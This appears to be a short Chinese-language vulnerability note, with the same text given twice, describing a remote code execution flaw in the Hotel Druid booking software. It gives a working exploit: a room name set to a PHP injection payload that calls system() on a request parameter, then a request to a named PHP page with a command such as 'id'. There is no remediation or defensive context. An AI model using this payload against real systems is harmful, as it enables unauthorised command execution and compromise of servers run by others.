…
漏洞描述:Hotel Druid RCE
在rooms模块里修改room的名字为{${system($_REQUEST[cmd])}}并提交,再访问/dati/selectappartamenti.php,传cmd=id可以看到回显,执行任意命令。
…
漏洞描述:Hotel Druid RCE
在rooms模块里修改room的名字为{${system($_REQUEST[cmd])}}并提交,再访问/dati/selectappartamenti.php,传cmd=id可以看到回显,执行任意命令。